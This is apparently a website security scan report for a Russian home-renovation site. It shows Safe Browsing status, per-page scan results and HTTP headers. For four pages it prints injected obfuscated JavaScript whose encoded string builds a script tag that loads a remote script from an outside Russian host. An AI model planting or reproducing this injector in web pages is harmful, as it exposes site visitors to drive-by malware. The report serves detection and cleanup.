Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=howxisy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://howxisy.com/ | 200 OK Content-Length: 36668 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!105!110!101!116!45!112!111!105!115!107!46!114!117!47!49!46!112!104!112!63!108!61!104!116!116!112!58!47!47!105!110!101!116!45!112!111!105!115!107!46!114!117!47!103!111!46!112!104!112!63!115!105!100!61!52!34!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://howxisy.com/engine/classes/js/jquery.js | 200 OK Content-Length: 93637 Content-Type: application/javascript | clean |
http://howxisy.com/engine/classes/js/jqueryui.js | 200 OK Content-Length: 64860 Content-Type: application/javascript | clean |
http://howxisy.com/engine/classes/js/dle_js.js | 200 OK Content-Length: 24985 Content-Type: application/javascript | clean |
http://howxisy.com/index.php?do=rules | 200 OK Content-Length: 20926 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!105!110!101!116!45!112!111!105!115!107!46!114!117!47!49!46!112!104!112!63!108!61!104!116!116!112!58!47!47!105!110!101!116!45!112!111!105!115!107!46!114!117!47!103!111!46!112!104!112!63!115!105!100!61!52!34!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://howxisy.com/index.php?do=register | 200 OK Content-Length: 19124 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!105!110!101!116!45!112!111!105!115!107!46!114!117!47!49!46!112!104!112!63!108!61!104!116!116!112!58!47!47!105!110!101!116!45!112!111!105!115!107!46!114!117!47!103!111!46!112!104!112!63!115!105!100!61!52!34!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://howxisy.com/index.php?do=sitemap | 200 OK Content-Length: 300341 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!104!116!116!112!58!47!47!105!110!101!116!45!112!111!105!115!107!46!114!117!47!49!46!112!104!112!63!108!61!104!116!116!112!58!47!47!105!110!101!116!45!112!111!105!115!107!46!114!117!47!103!111!46!112!104!112!63!115!105!100!61!52!34!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} Antivirus reports:
| ||
http://howxisy.com/1218-kak-sdelat-antresoli-remont-v-dome-kvartire-.html | 200 OK Content-Length: 54 Content-Type: text/html | clean |
http://howxisy.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://howxisy.com/1152-zhidkosti-i-polovoe-pokryitie.html | 200 OK Content-Length: 54 Content-Type: text/html | clean |
http://howxisy.com/1303-mineralnaya-vata-primenenie-v-stroitelstve.html | 200 OK Content-Length: 54 Content-Type: text/html | clean |
http://howxisy.com/1122-gruntovki-tonkosti-domashnego-remonta.html | 200 OK Content-Length: 54 Content-Type: text/html | clean |
http://howxisy.com/1492-sberbank-zaveril-chto-sdast-obektyi-k-oi-2014-v-srok-portal-.html | 200 OK Content-Length: 54 Content-Type: text/html | clean |
http://howxisy.com/1337-neobhodima-teplostojkost-ispolzujte-keramicheskie-bloki.html | 200 OK Content-Length: 54 Content-Type: text/html | clean |
http://howxisy.com/1335-nevozmozhnost-rekonstruktsii.html | 200 OK Content-Length: 54 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: howxisy.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 17 Sep 2014 21:30:22 GMT
Pragma: no-cache
Server: Apache/2.2.25 (FreeBSD) PHP/5.4.19 mod_ssl/2.2.25 OpenSSL/1.0.1e
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=b9s6gq2r83q53ecvubdv563vv3; path=/; HttpOnly
X-Powered-By: PHP/5.4.19
GET / HTTP/1.1
Host: howxisy.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 17 Sep 2014 21:30:22 GMT
Pragma: no-cache
Server: Apache/2.2.25 (FreeBSD) PHP/5.4.19 mod_ssl/2.2.25 OpenSSL/1.0.1e
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=b9s6gq2r83q53ecvubdv563vv3; path=/; HttpOnly
X-Powered-By: PHP/5.4.19
Second query (visit from search engine):
GET / HTTP/1.1
Host: howxisy.com
Referer: http://www.google.com/search?q=howxisy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: howxisy.com
Referer: http://www.google.com/search?q=howxisy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.